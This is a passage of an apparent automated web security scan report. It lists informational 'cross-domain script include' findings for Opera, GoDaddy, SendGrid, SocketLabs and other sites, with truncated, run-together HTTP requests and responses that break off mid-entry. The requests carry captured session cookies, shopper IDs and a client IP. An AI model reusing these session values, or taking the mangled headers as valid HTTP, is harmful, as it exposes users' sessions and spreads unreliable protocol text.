HTTP/1.1 200 OKzowNzowMA==?v=br79xGSpgF4-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... <script type="text/javascript" src="http://static.myopera.com/community/js/cookies-min.js"> </script>...[SNIP]...
16.14. https://my.opera.com/community/signup/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://my.opera.com
Path:
/community/signup/
Issue detail
The response dynamically includes the following scripts from other domains:https://static.myopera.com/community/js/lib/opera-driver-yui-min.js https://static.myopera.com/community/js/lib/opera-min.js https://static.myopera.com/community/js/lib/yui/build/selector/selector-min.js https://static.myopera.com/community/js/lib/yui/build/yuiloader-dom-event/yuiloader-dom-event-min.js https://www.google.com/recaptcha/api/challenge?k=6LfnuAYAAAAAAJ_9S1HZ8qxfs145BrjYjzec1yjC
Request
GET /community/signup/?s_ref=home HTTP/1.1/community//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=218314117.1470107793.1316208001.1316208001.1316208001.1; __utmb=218314117.1.10.1316208001; __utmc=218314117; __utmz=218314117.1316208001.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OKzowMTowMA==-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... <script src="https://www.google.com/recaptcha/api/challenge?k=6LfnuAYAAAAAAJ_9S1HZ8qxfs145BrjYjzec1yjC" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="https://static.myopera.com/community/js/lib/yui/build/yuiloader-dom-event/yuiloader-dom-event-min.js"> </script><script type="text/javascript" src="https://static.myopera.com/community/js/lib/yui/build/selector/selector-min.js"> </script><script type="text/javascript" src="https://static.myopera.com/community/js/lib/opera-min.js"> </script><script type="text/javascript" src="https://static.myopera.com/community/js/lib/opera-driver-yui-min.js"> </script>...[SNIP]...
16.15. https://mya.godaddy.com/Default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/Default.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1 https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js https://img1.wsimg.com/mya/scripts/jquery.stylish-select3.min.js https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1 https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET /Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d
Response
HTTP/1.1 200 OKbkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/rceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... 'body').html('');"><script src="https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery.stylish-select3.min.js" type="text/javascript"> </script>...[SNIP]... .com/pc_css/1/gd_20110906_https.min.css' type="text/css" rel="stylesheet" /><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]...
16.16. https://mya.godaddy.com/myrenewals/myRenewals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/myrenewals/myRenewals.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1 https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js https://img1.wsimg.com/mya/scripts/jquery.ui.datepicker.min.js https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1 https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET /myrenewals/myRenewals.aspx?ci=11279&tab=products HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... 'body').html('');"><script src="https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/mya-master-script2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery-ui-scripts2.min.js" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/json-popin2.js?version=1" type="text/javascript"> </script><script src="https://img1.wsimg.com/mya/scripts/jquery.ui.datepicker.min.js" type="text/javascript"> </script>...[SNIP]... .com/pc_css/1/gd_20110906_https.min.css' type="text/css" rel="stylesheet" /><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]...
16.17. http://portal.opera.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://portal.opera.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://pagead2.googlesyndication.com/pagead/show_ads.js http://ws.amazon.com/widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733
Request
GET / HTTP/1.1/company//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/
Response
HTTP/1.1 200 OK,Accept-Encoding/static/misc/yadis.xrdf52a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:19:20 GMT; Max-Age=31449600; Path=/...[SNIP]... <script type="text/javascript".googlesyndication.com/pagead/show_ads.js"> ...[SNIP]... <SCRIPT charset="utf-8" type="text/javascript" src="http://ws.amazon.com/widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733"> </SCRIPT>...[SNIP]...
16.18. http://portal.opera.com/portal/tabs/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://portal.opera.com
Path:
/portal/tabs/
Issue detail
The response dynamically includes the following scripts from other domains:http://pagead2.googlesyndication.com/pagead/show_ads.js http://ws.amazon.com/widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733
Request
GET /portal/tabs/?tab_name=News HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; csrftoken=838dab485752a3df29256e939fd2d3cb; opal_sessionid=46086d7992e13cfe7e9bdef9bd665ed5; __utma=258618251.1095286181.1316208009.1316208009.1316208009.1; __utmb=258618251.1.10.1316208016; __utmc=258618251; __utmz=258618251.1316208016.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OK,Accept-Encoding/static/misc/yadis.xrdf52a3df29256e939fd2d3cb; expires=Fri, 14-Sep-2012 16:24:54 GMT; Max-Age=31449600; Path=/...[SNIP]... <script type="text/javascript".googlesyndication.com/pagead/show_ads.js"> ...[SNIP]... <SCRIPT charset="utf-8" type="text/javascript" src="http://ws.amazon.com/widgets/q?rt=tf_sw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733"> </SCRIPT>...[SNIP]...
16.19. http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://powermta1.com
Path:
/wp-content/plugins/cforms/js/cforms.js
Issue detail
The response dynamically includes the following scripts from other domains:http://as.casalemedia.com/sd?s=95308&f=1 http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js
Request
GET /wp-content/plugins/cforms/js/cforms.js?f389a660 HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"> </script>...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"> </script>...[SNIP]...
16.20. http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://powermta1.com
Path:
/wp-content/plugins/cforms/styling/sidebar-layout.css
Issue detail
The response dynamically includes the following scripts from other domains:http://as.casalemedia.com/sd?s=95308&f=1 http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js
Request
GET /wp-content/plugins/cforms/styling/sidebar-layout.css?f389a660 HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A;q=0.3
Response
HTTP/1.1 200 OK97088384; domain=powermta1.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"> </script>...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"> </script>...[SNIP]...
16.21. http://seg.sharethis.com/getSegment.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://seg.sharethis.com
Path:
/getSegment.php
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3T7FCnHuAg==
Response
HTTP/1.1 200 OK, CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"/html4/loose.dtd">;charset=UTF-8">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
16.22. http://sendgrid.com/features
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sendgrid.com
Path:
/features
Issue detail
The response dynamically includes the following scripts from other domains:http://d2gramajkvysi4.cloudfront.net/js/new/placeholders.gz.js?r=1309887505 http://edge.quantserve.com/quant.js https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js
Request
GET /features HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1; symfony=2620e59692610735faaba9cd7ccd2c6f:85ae52515893387e57b673877b205ea2bae4ed49; __qca=P0-572909897-1316204950437; _mkto_trk=id:467-KXI-123&token:_mch-sendgrid.com-1316204836485-43033; __utma=111872475.871024225.1316204951.1316204951.1316204951.1; __utmb=111872475.1.10.1316204951; __utmc=111872475; __utmz=111872475.1316204951.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set); SnapABugRef=http%3A%2F%2Fsendgrid.com%2Fpricing.html%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ%20http%3A%2F%2Flanding.sendgrid.com%2Fsmtp-with-bullet-points%2F%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ; SnapABugHistory=1#; SnapABugVisit=8d68486b-56f8-4224-9862-8ffa3106ecfb-578112706076353; km_ai=n1EPXU78Lr4accy0ZIHA%2Fx7iGbI%3D; km_lv=1316204954; km_uq=; _chartbeat2=al0oan3xoujtpzgt.1316204955548
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js"> </script>...[SNIP]... <script type="text/javascript" src="http://d2gramajkvysi4.cloudfront.net/js/new/placeholders.gz.js?r=1309887505"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]...
16.23. http://sendgrid.com/pricing.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sendgrid.com
Path:
/pricing.html
Issue detail
The response dynamically includes the following scripts from other domains:http://d2gramajkvysi4.cloudfront.net/js/new/placeholders.gz.js?r=1309887505 http://edge.quantserve.com/quant.js https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js
Request
GET /pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ HTTP/1.1.com/smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3&token:_mch-sendgrid.com-1316204836485-43033; __utma=139434414.731002222.1316204836.1316204836.1316204836.1; __utmb=139434414.2.10.1316204836; __utmc=139434414; __utmz=139434414.1316204836.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ptca=111872475.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js"> </script>...[SNIP]... <script type="text/javascript" src="http://d2gramajkvysi4.cloudfront.net/js/new/placeholders.gz.js?r=1309887505"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]...
16.24. https://sendgrid.com/user/signup/package/44
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://sendgrid.com
Path:
/user/signup/package/44
Issue detail
The response dynamically includes the following scripts from other domains:https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js https://s3.amazonaws.com/static.sendgrid.com/js/ext/activeTab.gz.js?r=1309887444 https://s3.amazonaws.com/static.sendgrid.com/js/ext/sgDateRange.gz.js?r=1316132376 https://s3.amazonaws.com/static.sendgrid.com/js/ext/sgTable.gz.js?r=1316132376 https://s3.amazonaws.com/static.sendgrid.com/js/ext/spamReports.gz.js?r=1309887451 https://s3.amazonaws.com/static.sendgrid.com/js/jquery.fadetransition.gz.js?r=1309888008 https://s3.amazonaws.com/static.sendgrid.com/js/jquery.showpassword.min.gz.js?r=1309887513 https://s3.amazonaws.com/static.sendgrid.com/js/new/main.gz.js?r=1309887506 https://s3.amazonaws.com/static.sendgrid.com/js/new/placeholders.gz.js?r=1309887505 https://s3.amazonaws.com/static.sendgrid.com/js/sg.gz.js?r=1315865266
Request
GET /user/signup/package/44 HTTP/1.1/pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1; symfony=2620e59692610735faaba9cd7ccd2c6f:85ae52515893387e57b673877b205ea2bae4ed49; __qca=P0-572909897-1316204950437; _mkto_trk=id:467-KXI-123&token:_mch-sendgrid.com-1316204836485-43033; __utma=111872475.871024225.1316204951.1316204951.1316204951.1; __utmb=111872475.1.10.1316204951; __utmc=111872475; __utmz=111872475.1316204951.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set); SnapABugRef=http%3A%2F%2Fsendgrid.com%2Fpricing.html%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ%20http%3A%2F%2Flanding.sendgrid.com%2Fsmtp-with-bullet-points%2F%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ; SnapABugHistory=1#; SnapABugVisit=8d68486b-56f8-4224-9862-8ffa3106ecfb-578112706076353; km_ai=n1EPXU78Lr4accy0ZIHA%2Fx7iGbI%3D; km_lv=1316204954; km_uq=; _chartbeat2=al0oan3xoujtpzgt.1316204955548
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js"> </script>...[SNIP]... <script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/new/placeholders.gz.js?r=1309887505"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/new/main.gz.js?r=1309887506"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/jquery.fadetransition.gz.js?r=1309888008"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/sg.gz.js?r=1315865266"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/ext/activeTab.gz.js?r=1309887444"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/ext/sgTable.gz.js?r=1316132376"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/ext/spamReports.gz.js?r=1309887451"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/ext/sgDateRange.gz.js?r=1316132376"> </script>...[SNIP]... <script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/js/jquery.showpassword.min.gz.js?r=1309887513"> </script>...[SNIP]...
16.25. https://support.socketlabs.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js
Request
GET / HTTP/1.1/faq//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js"> </script>...[SNIP]...
16.26. https://support.socketlabs.com/index.php/Base/User/Login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/User/Login
Issue detail
The response dynamically includes the following script from another domain:https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js
Request
POST /index.php/Base/User/Login HTTP/1.1.socketlabs.com/.socketlabs.com-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf%2FKnowledgebase%2FHomeIndex%2FIndex&scemail=Your+email+address&scpassword=
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js"> </script>...[SNIP]...
16.27. https://support.socketlabs.com/index.php/Base/UserRegistration/Register
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/Register
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js https://www.google.com/recaptcha/api/js/recaptcha_ajax.js
Request
GET /index.php/Base/UserRegistration/Register HTTP/1.1.socketlabs.com/index.php/Base/User/Login/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js"> </script>...[SNIP]... <script type="text/javascript" src="https://www.google.com/recaptcha/api/js/recaptcha_ajax.js"> </script>...[SNIP]...
16.28. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/RegisterSubmit
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js https://www.google.com/recaptcha/api/js/recaptcha_ajax.js
Request
POST /index.php/Base/UserRegistration/RegisterSubmit HTTP/1.1.socketlabs.com/index.php/Base/UserRegistration/Register.socketlabs.comormBoundaryKmcBgFc5dd4a1T1r/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bfdaryKmcBgFc5dd4a1T1rdaryKmcBgFc5dd4a1T1r...[SNIP]...
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jquery.templates/beta1/jquery.tmpl.min.js"> </script>...[SNIP]... <script type="text/javascript" src="https://www.google.com/recaptcha/api/js/recaptcha_ajax.js"> </script>...[SNIP]...
16.29. http://t.tellapart.com/hif
previous
next
Summary
Severity:
